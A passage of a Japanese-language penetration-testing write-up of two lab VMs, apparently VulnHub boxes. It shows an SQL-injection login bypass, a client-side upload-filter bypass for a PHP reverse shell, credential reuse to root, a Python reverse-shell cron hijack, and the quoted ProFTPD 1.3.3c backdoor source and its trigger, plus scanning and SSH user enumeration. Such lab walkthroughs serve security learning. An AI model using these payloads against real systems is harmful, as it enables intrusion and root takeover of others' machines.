+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.12

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat May  9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/                                                                            
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)                                                                   
==> DIRECTORY: http://10.10.10.12/javascript/                                                                        
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)                                                               
==> DIRECTORY: http://10.10.10.12/uploads/                                                                           
                                                                                                                     
---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)                                                 
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)                                                     
                                                                                                                     
-----------------
END_TIME: Sat May  9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4

apacheやphp自体には特に何も無さそう。
色々ディレクトリはあるが目ぼしいものは無く
どう考えても「/uploads/」には怪しさしかないのだが。
config.phpは単純なアクセスじゃ見れない。
login.phpは適当にやっても通らなさそう。
しかし、

# curl 10.10.10.12/login.php
(snip)
 <div class="login-box">
    <div class="lb-header">
      <a href="#" class="active" id="login-box-link">Giris Yap</a>
    </div>
   <form method="Post" name="loginform" action="personel.php" class="email-login">
      <div class="u-form-group">
        <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/> 
      </div>
      <div class="u-form-group">
        <input type="password" id="pwd" name="parola" placeholder="Parola" required/>
      </div>
      <div class="u-form-group">
        <input type="button" value="Giris" onclick="control();" />
      </div>
   
    </form>
  </div>
  
  <script type="text/javascript">
    
function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    var str=user.substring(user.lastIndexOf("@")+1,user.length);
    
    if((pwd == "'")){
        alert("Hack Denemesi !!!");
        
    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");
    
    }   
    else{
        
      document.loginform.submit();
    }
}
</script>

パスワードにシングルクォーテーションが含まれていると拒否されて、
メールアドレスに「@btrisk.com」が含まれていないと許されないよう。
以上を満たせば、適当な値でログインできるぽい？
その遷移先ページは

# curl 10.10.10.12/personel.php
(snip)
        <script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        document.myform.submit();
    }else{
        //mesaj
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
        return false;
        
        
    }
}
</script>

ファイルアップロードスクリプトがある？
スクリプトを動かす、ボタン等が見つからない。
改めて、login.phpへ戻る。
色々ログインを試していたら、「@btrisk.com」の前ならシングルクォーテーションを利用できる。
メールアドレスに「' or '1'='1'-- @btrisk.com」でSQLi通った模様。
SQLiが刺さればログインできたようで、getFile()のボタンを発見。
リバシェphpは、いつものpentestmonkeyのやつ「/usr/share/webshells/php/php-reverse-shell.php」
reverse-shellするphpファイルをアップロードしようとすると「jpg,gif,png」じゃないからダメと言われる。
しかし、画像ファイルじゃないとダメだという判断はjavascriptがサーバ側でなくクライアント側で行っているので、ブラウザのコンソールでgetFile()を弄ってやれば回避可能。
自分の場合、参照にファイルをセットした後、ブラウザのコンソールから「document.myform.submit();」を叩いてやることでuploadした。
さて、アップロードしたファイルはどこにアップロードされるのか。
それはやはり、「/uploads/」に決まっている。
実際、アップロード後に確認して見るとファイルが上がっている。
shell getchu!

window 1

# nc -nlvp 443

window 2

# curl 10.10.10.12/uploads/reverse.php

window 1


Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 19:00:23 up 11:28,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

他に、「/javascript/」は「Forbidden」だったが、 「/javascript/jquery/jquery」と「/javascript/jquery/version」は何故か200である。

after shell getchu

sqlデータベースにある資格情報の利用

まずは、先ほど見れなかった「config.php」を見に行く。

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
ls
assets      gonder.php      index.php  personel.php  uploads
config.php  hakkimizda.php  login.php  sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
  {
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
  }
/////////////////////////////////////////////////////////////////////////////////////////
?>

www-data@BTRsys1:/var/www/html$ 

まさかmysqlのroot起動によるのroot権限奪取か？

www-data@BTRsys1:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select sys_exec("id");
select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist

そんなことは無かったので色々見ていく。

mysql> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use information_schema;
use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

mysql> use deneme;
use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql> select * from user;
select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)

mysql> 

これは色々使えそうな情報では？

www-data@BTRsys1:/var/www/html$ su -
su -
Password: asd123***

root@BTRsys1:~# id
id
uid=0(root) gid=0(root) groups=0(root)

root shell getchu!!

cronを見た

「find / -perm -2 -type f 2>/dev/null」という面白いコマンドを見つけたので早速使って見る。

www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type f 2>/dev/null
/var/tmp/cleaner.py.swp
/var/log/cronlog
(snip)
/lib/log/cleaner.py

結果は殆どどうでも良いが、面白いものを発見。
「/var/log/cronlog」,「/lib/log/cleaner.py」とは一体何なのだろうか。

www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog    
cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
ls -al /lib/log/ | grep cleaner
-rwxrwxrwx  1 root root   96 Aug 13  2014 cleaner.py

「clearner.py」を書き換えてやればroot取れる。
今回は以下への書き換えを行う。

#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

「LHOST」と「LPORT」はお好みで。

attacker

# python -m SimpleHTTPServer 80

victim

www-data@BTRsys1:/var/www/html$ cd /lib/log
cd /lib/log
www-data@BTRsys1:/lib/log$ cd /tmp                   
cd /tmp
www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-09 20:03:17--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: 'getroot.py'

100%[======================================>] 238         --.-K/s   in 0s      

2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238]

www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py
cp ./getroot.py /lib/log/cleaner.py
www-data@BTRsys1:/tmp$ 

attacker
(cron待ち)
# nc -nlvp 8080
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.10.10.12.
Ncat: Connection from 10.10.10.12:56889.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

「/tmp」下だと、タイミングが悪いとcleaner.pyに 消される可能性があるので「/var/www/html/uploads」で作業する方が良いかもしれない。

学び

• 「find / -perm -2 -type f 2>/dev/null」は偉大では！？

Basic Pentesting 1

サービス調査

# nmap -p- 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:43 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:44 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00093s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds

なんか今回早い。

気になりどころ

• [port 21] ftp ProFTPD 1.3.3c
• [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
• [port 80] http Apache httpd 2.4.18 (Ubuntu)

詳細

[port 21] ftp ProFTPD 1.3.3c

# searchsploit proftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution           | exploits/linux/remote/15662.txt
(snip)
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow                               | exploits/linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution                                 | exploits/linux/remote/15449.pl
(snip)

早速刺さりそうなのを発見。
下二つは刺さらず。
一番刺さりそうなやつの中身を確認

# cat 15662.txt
== ProFTPD Compromise Report ==

On Sunday, the 28th of November 2010 around 20:00 UTC the main
distribution server of the ProFTPD project was compromised.  The
attackers most likely used an unpatched security issue in the FTP daemon
to gain access to the server and used their privileges to replace the
source files for ProFTPD 1.3.3c with a version which contained a backdoor.
The unauthorized modification of the source code was noticed by
Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on
Wednesday, December 1 and fixed shortly afterwards.

The fact that the server acted as the main FTP site for the ProFTPD
project (ftp.proftpd.org) as well as the rsync distribution server
(rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who
downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28
to 2010-12-02 will most likely be affected by the problem.

The backdoor introduced by the attackers allows unauthenticated users
remote root access to systems which run the maliciously modified version
of the ProFTPD daemon.

Users are strongly advised to check systems running the affected code for
security compromises and compile/run a known good version of the code.
To verify the integrity of the source files, use the GPG signatures
available on the FTP servers as well on the ProFTPD homepage at:

  http://www.proftpd.org/md5_pgp.html.

The MD5 sums for the source tarballs are:

 8571bd78874b557e98480ed48e2df1d2  proftpd-1.3.3c.tar.bz2
 4f2c554d6273b8145095837913ba9e5d  proftpd-1.3.3c.tar.gz




= Rootkit patch =

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure   2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
-
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then


diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c  2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@
  */
 
 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>
 
 struct help_rec {
   const char *cmd;
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");
 
     } else {
-
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {


diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c    2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+    close(sock);
+    exit(0);
+}
+
+int main(void)
+{
+
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="212.26.42.47";    /*  EDB NOTE - HARDCODED IP */
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+
+return 0; }
+

どうやらある時期に配信されていた「ProFTPD」は改ざんされておりbockdoorが仕掛けられているらしい。
Exploits/proftpd-1.3.3c-backdoor - aldeid
このbackdoorを使うのは至って簡単。

# telnet 10.10.10.10 21
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (vtcsec) [10.10.10.10]
HELP ACIDBITCHEZ 
id;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c "import pty;pty.spawn('/bin/sh')";
# whoami
whoami

root

あっさり終わった。

Ctrl + ]
telnet > q

で終了。

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

未だsshの脆弱性利用経験なく、今回も無いのでは。

# searchsploit openssh
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
OpenSSH 7.2p2 - Username Enumeration                                         | exploits/linux/remote/40136.py
(snip)

userenumerationのみ。
または、限定環境のRCE等。
直接RCEに繋がりそうなものは無い?
とりあえず見つけたuserにhydraすりゃ良いのかなぁ

# cp /usr/share/exploitdb/exploits/linux/remote/40136.py 40136.py
# python 40136.py 
usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES]
                [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS]
                host
40136.py: error: too few arguments
# python 40136.py -U /usr/share/wordlists/rockyou.txt -e 10.10.10.10
(snip)
[*] Testing your users...
[+] password - timing: 0.018958999999999726
[+] princess - timing: 0.413513
[+] 1234567 - timing: 0.019588999999999857
[+] justin - timing: 0.019359000000000126
[+] samantha - timing: 0.01800700000000033
[+] lovers - timing: 0.018003000000000213
[+] dragon - timing: 0.023400999999999783
[+] sweety - timing: 0.020548000000000233
[+] buster - timing: 0.020329999999999515
[+] cheese - timing: 0.020527999999999658
[+] kenneth - timing: 0.0184350000000002
[+] nicholas - timing: 0.021569999999999645
[+] charles - timing: 0.018767999999999674
[+] christine - timing: 0.02230100000000057
[+] scorpio - timing: 0.43433799999999945
[+] ronald - timing: 0.022024000000000044
[+] grace - timing: 0.01963800000000049
[+] 444444 - timing: 0.018848000000000198
[+] rabbit - timing: 0.0182739999999999
[+] loverboy - timing: 0.0191719999999993
(snip)
KeyboardInterrupt

userlistにrockyou.txt使って見たけど、以外と沢山いたので途中で止めた。
逆に多すぎて精度が怪しく感じる。

# python 40136.py -u root 10.10.10.10
(snip)
[*] Testing your users...
[-] root - timing: 0.009611000000000036

沢山いたけど、rootはおらんとな。
とりあえず見つかったユーザでhydraでも回してみる。 終わらないのであきらめ。

[port 80] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        80
+ Start Time:         2020-05-04 03:10:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7837 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-04 03:11:26 (GMT-4) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.10

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May  4 03:11:39 2020
URL_BASE: http://10.10.10.10/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.10/ ----
+ http://10.10.10.10/index.html (CODE:200|SIZE:177)                                                                  
==> DIRECTORY: http://10.10.10.10/secret/                                                                            
+ http://10.10.10.10/server-status (CODE:403|SIZE:299)                                                               
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/ ----
+ http://10.10.10.10/secret/index.php (CODE:301|SIZE:0)                                                              
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/                                                                   
==> DIRECTORY: http://10.10.10.10/secret/wp-content/                                                                 
==> DIRECTORY: http://10.10.10.10/secret/wp-includes/                                                                
+ http://10.10.10.10/secret/xmlrpc.php (CODE:405|SIZE:42)                                                            
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/ ----
+ http://10.10.10.10/secret/wp-admin/admin.php (CODE:302|SIZE:0)                                                     
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/css/                                                               
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/images/                                                            
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/includes/                                                          
+ http://10.10.10.10/secret/wp-admin/index.php (CODE:302|SIZE:0)                                                     
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/js/                                                                
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/maint/                                                             
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/network/                                                           
==> DIRECTORY: http://10.10.10.10/secret/wp-admin/user/                                                              
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/ ----
+ http://10.10.10.10/secret/wp-content/index.php (CODE:200|SIZE:0)                                                   
==> DIRECTORY: http://10.10.10.10/secret/wp-content/plugins/                                                         
==> DIRECTORY: http://10.10.10.10/secret/wp-content/themes/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/network/ ----
+ http://10.10.10.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)                                             
+ http://10.10.10.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-admin/user/ ----
+ http://10.10.10.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                
+ http://10.10.10.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/plugins/ ----
+ http://10.10.10.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.10/secret/wp-content/themes/ ----
+ http://10.10.10.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0)                                            
                                                                                                                     
-----------------
END_TIME: Mon May  4 03:12:26 2020
DOWNLOADED: 36896 - FOUND: 13

突然のwordpress登場。
何か可笑しい？
「http://vtcsec/secret/index.php/wp-json/」が気になる。
「http://10.10.10.10/secret」に接続すると、何か表示変な気がするし、多くのリンクが「vtcsec」ドメインになっている。
つまり、hostファイルに「vtcsec」を登録する必要がある？

# echo "10.10.10.10 vtcsec" >> /etc/hosts
# curl http://vtcsec
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body></html>

先ほど上手く繋がらなかったリンクにも飛べるようになった。

# wpscan --url http://vtcsec/secret -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://vtcsec/secret/ [10.10.10.10]
[+] Started: Mon May  4 07:23:46 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://vtcsec/secret/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://vtcsec/secret/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://vtcsec/secret/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).
 | Found By: Rss Generator (Passive Detection)
 |  - http://vtcsec/secret/index.php/feed/, <generator>https://wordpress.org/?v=4.9</generator>
 |  - http://vtcsec/secret/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9
 | Style Name: Twenty Seventeen
